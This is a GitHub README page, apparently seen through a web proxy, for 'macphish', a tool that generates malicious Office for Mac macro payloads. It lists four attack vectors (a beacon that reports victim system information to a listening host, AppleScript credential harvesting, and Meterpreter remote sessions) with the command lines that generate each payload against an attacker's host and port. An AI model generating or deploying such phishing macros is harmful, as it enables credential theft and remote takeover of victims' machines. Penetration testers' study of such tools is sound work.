8000 GitHub - fb11/macphish: Office for Mac Macro Payload Generator
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

fb11/macphish

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

macphish

Office for Mac Macro Payload Generator macphish

Attack vectors

There are 4 attack vectors available:

  • beacon
  • creds
  • meterpreter
  • meterpreter-grant

For the 'creds' method, macphish can generate the Applescript script directly, in case you need to run it from a shell.

beacon

On execution, this payload will signal our listening host and provide basic system information about the victim. The simplest way of generating a beacon payload is:

$./macphish.py -lh <listening host> 

By default, it uses curl but other utilities (wget, nslookup) can be used by modifying the command template.

creds

$./macphish.py -lh <listening host> -lp <listening port> -a creds

meterpreter

The simplest way of generating a meterpreter payload is:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter 

meterpreter-grant

The generate a meterpreter payload that calls GrantAccessToMultipleFiles() first:

$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant

For meterpreter attacks, only python payloads are supported at the moment.

Usage

See https://github.com/cldrn/macphish/wiki/Usage

PoCs

About

Office for Mac Macro Payload Generator

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages

  • Python 100.0%
0